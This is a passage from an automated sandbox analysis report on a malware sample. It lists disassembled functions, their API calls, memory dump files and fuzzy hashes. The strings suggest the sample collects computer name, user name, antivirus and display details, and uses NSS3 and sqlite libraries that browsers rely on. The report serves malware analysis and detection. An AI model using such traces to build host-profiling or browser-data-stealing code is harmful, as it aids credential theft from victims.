                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 161582014-0
                                                                                                                                                                                                              • Opcode ID: 4ad68590067ee0377eff4e11d5c13219d5f1f7084c8bbd96265b5de4f95c3d0e
                                                                                                                                                                                                              • Instruction ID: 3347fd63faa7cfb88a9678c396df5a4526729fe9db8fea6295cf650b6ed6b13c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ad68590067ee0377eff4e11d5c13219d5f1f7084c8bbd96265b5de4f95c3d0e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75517EB1A00642EFDB01DF25D885A5ABBB4FF04318F144A64E91897E11E731F8A4CFD2
                                                                                                                                                                                                              Function 6CAE4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,00000000,00000000,?,6CAEAB7F,?,00000000,?), ref: 6CAE4CB4
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C,?,6CAEAB7F,?,00000000,?), ref: 6CAE4CC8
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,6CAEAB7F,?,00000000,?), ref: 6CAE4CE0
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,6CAEAB7F,?,00000000,?), ref: 6CAE4CF4
                                                                                                                                                                                                              • PL_HashTableLookup.NSS3(?,?,?,6CAEAB7F,?,00000000,?), ref: 6CAE4D03
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,00000000,?), ref: 6CAE4D10
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: TlsGetValue.KERNEL32 ref: 6CB6DD8C
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DDB4
                                                                                                                                                                                                              • PR_Now.NSS3(?,00000000,?), ref: 6CAE4D26
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CBD0A27), ref: 6CB89DC6
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CBD0A27), ref: 6CB89DD1
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB89DED
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,00000000,?), ref: 6CAE4D98
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CAE4DDA
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CAE4E02
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4032354334-0
                                                                                                                                                                                                              • Opcode ID: 7b73ac8cfe3b75a6ba2e8444055e651fdcfccc65690a4406facd75c391e0d11d
                                                                                                                                                                                                              • Instruction ID: 6dcde5e44df0f3e47756a327048509ec9f234a3f7040091c46acd3a1b2f50940
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b73ac8cfe3b75a6ba2e8444055e651fdcfccc65690a4406facd75c391e0d11d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F141A5B59002059BEB01AF79ED84A9A77BCFF09258F194170EC1887B12EB31E998D7D1
                                                                                                                                                                                                              Function 6CAAFC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_initialize.NSS3 ref: 6CAAFD18
                                                                                                                                                                                                              • sqlite3_initialize.NSS3 ref: 6CAAFD5F
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CAAFD89
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6CAAFD99
                                                                                                                                                                                                              • sqlite3_free.NSS3(00000000), ref: 6CAAFE3C
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CAAFEE3
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CAAFEEE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                                                                                                                                                                              • String ID: simple
                                                                                                                                                                                                              • API String ID: 1130978851-3246079234
                                                                                                                                                                                                              • Opcode ID: 86cc11ed9b6f99f4abb5d930f57be03bad2e3788f99b49e3a6e19748d858010e
                                                                                                                                                                                                              • Instruction ID: 48ffc8fe27c32d87d54e1ea25ce2bf99051c71ef5f046a805bd0f60fb71bcd80
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86cc11ed9b6f99f4abb5d930f57be03bad2e3788f99b49e3a6e19748d858010e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 659161B0A012059FDB18CF95CD80A6AF7B1FF85318F28C16DD819AB752D731E896CB50
                                                                                                                                                                                                              Function 6CAB5CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CAB5EC9
                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CAB5EED
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • misuse, xrefs: 6CAB5EDB
                                                                                                                                                                                                              • unable to close due to unfinalized statements or unfinished backups, xrefs: 6CAB5E64
                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CAB5ED1
                                                                                                                                                                                                              • invalid, xrefs: 6CAB5EBE
                                                                                                                                                                                                              • API call with %s database connection pointer, xrefs: 6CAB5EC3
                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CAB5EE0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                                                              • API String ID: 632333372-1982981357
                                                                                                                                                                                                              • Opcode ID: f0eafc94966fbaa263ca07efd87bcc7dab177c3ab7216525d79e522a86928a0c
                                                                                                                                                                                                              • Instruction ID: d7670abe2c732b5723cc1e56ed75753aa8f8999217a44f1d08ed2269cda730ba
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0eafc94966fbaa263ca07efd87bcc7dab177c3ab7216525d79e522a86928a0c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1681AF30B056519BEB19CF25C848BAAB7B8BF41318F2C4369D8157BB51D734E8C6CB91
                                                                                                                                                                                                              Function 6CA9DCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA9DDF9
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA9DE68
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA9DE97
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CA9DEB6
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA9DF78
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 1526119172-598938438
                                                                                                                                                                                                              • Opcode ID: 92eb6061ac0762a9f57ea19cb769fe2d063f9489c2bb7154be1e628be68ae788
                                                                                                                                                                                                              • Instruction ID: efb4b26eaee1a4f180d82aead9e0b2c6f832d0c2d48f717da7cffd18d46afdac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92eb6061ac0762a9f57ea19cb769fe2d063f9489c2bb7154be1e628be68ae788
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3881C575A153009FD714CF25C881B6AB7F1BF45308F14882DE99A8BB61E731E8C5C752
                                                                                                                                                                                                              Function 6CA4CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CA4B999), ref: 6CA4CFF3
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CA4B999), ref: 6CA4D02B
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6CA4B999), ref: 6CA4D041
                                                                                                                                                                                                              • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CA4B999), ref: 6CB9972B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 491875419-598938438
                                                                                                                                                                                                              • Opcode ID: 22e9a516104dd1d9b30ef71ae17ebf5ab4a660c027f9d40806b172fd3de422ff
                                                                                                                                                                                                              • Instruction ID: ad723924c0192076d0142452117705709fe5498f2592d4fe0d12571742034a5c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22e9a516104dd1d9b30ef71ae17ebf5ab4a660c027f9d40806b172fd3de422ff
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD611971A042508FD310CF29C840BA7B7F5EF95318F28856DE4499BB42D37AD98BC7A1
                                                                                                                                                                                                              Function 0092DB54 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109stringmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,75B65460,?,00000000), ref: 0092DB90
                                                                                                                                                                                                              • strchr.MSVCRT ref: 0092DBA2
                                                                                                                                                                                                              • strchr.MSVCRT ref: 0092DBC7
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0092DCCC), ref: 0092DBE9
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0092DBF6
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0092DCCC), ref: 0092DBFD
                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0092DC44
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
                                                                                                                                                                                                              • String ID: 0123456789ABCDEF
                                                                                                                                                                                                              • API String ID: 453150750-2554083253
                                                                                                                                                                                                              • Opcode ID: 78cd778c12916abadc18bfbe865f6fb55ed3eb44ecbeb539cb85e8e01b737a30
                                                                                                                                                                                                              • Instruction ID: 8e2a2da5e18df1a25b760a5d1b26c6a26804baf7af9c64af0aa9a506b6767e63
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78cd778c12916abadc18bfbe865f6fb55ed3eb44ecbeb539cb85e8e01b737a30
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB314D729052199FDB00DFE8DC89AEEBBB9AF48311F110168F905FB285DB75A905CB90
                                                                                                                                                                                                              Function 0093FAD2 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • UnDecorator::getArgumentList.LIBCMT ref: 0093FAF7
                                                                                                                                                                                                                • Part of subcall function 0093F692: Replicator::operator[].LIBCMT ref: 0093F715
                                                                                                                                                                                                                • Part of subcall function 0093F692: DName::operator+=.LIBCMT ref: 0093F71D
                                                                                                                                                                                                              • DName::operator+.LIBCMT ref: 0093FB50
                                                                                                                                                                                                              • DName::DName.LIBCMT ref: 0093FBA8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                                                                                                              • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                              • API String ID: 834187326-2211150622
                                                                                                                                                                                                              • Opcode ID: 6d001ce4d8ec0e20e4c031aff34751e2b71d1834d34d5507c19c3a3de7b6b056
                                                                                                                                                                                                              • Instruction ID: 87fc4324341ef4c5dbbd70b96c4e1cf625fafb5c4ed54d441113084414d71b00
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d001ce4d8ec0e20e4c031aff34751e2b71d1834d34d5507c19c3a3de7b6b056
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE218C71A052049FCB11DF18D8619A9BBF8EF85389F0480A5F809DF261CB31DA46DB41
                                                                                                                                                                                                              Function 0094146B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • UnDecorator::UScore.LIBCMT ref: 00941475
                                                                                                                                                                                                              • DName::DName.LIBCMT ref: 00941481
                                                                                                                                                                                                                • Part of subcall function 0093F14C: DName::doPchar.LIBCMT ref: 0093F17D
                                                                                                                                                                                                              • UnDecorator::getScopedName.LIBCMT ref: 009414C0
                                                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 009414CA
                                                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 009414D9
                                                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 009414E5
                                                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 009414F2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                                                                                                              • String ID: void
                                                                                                                                                                                                              • API String ID: 1480779885-3531332078
                                                                                                                                                                                                              • Opcode ID: d363c044d36a54723631847f2770aa262dd4a65caf458a4d27924a66e800d0eb
                                                                                                                                                                                                              • Instruction ID: 0f5c597609d54c427f025f35c235aae1039900dfb7fe40bc5281d4a60d2c822d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d363c044d36a54723631847f2770aa262dd4a65caf458a4d27924a66e800d0eb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5711CC71A04208AFDB19EB64C866FAD7BB4EF90305F0440A4F4169B2F1DB709E85CB41
                                                                                                                                                                                                              Function 00931538 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0093154A
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00931555
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00931560
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0093156B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,009340D8,?,Display Resolution: ,009568FC,00000000,User Name: ,009568EC,00000000,Computer Name: ,009568D8,AV: ,009568CC), ref: 00931577
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,009340D8,?,Display Resolution: ,009568FC,00000000,User Name: ,009568EC,00000000,Computer Name: ,009568D8,AV: ,009568CC,Install Date: ), ref: 0093157E
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00931590
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                              • String ID: %dx%d
                                                                                                                                                                                                              • API String ID: 3940144428-2206825331
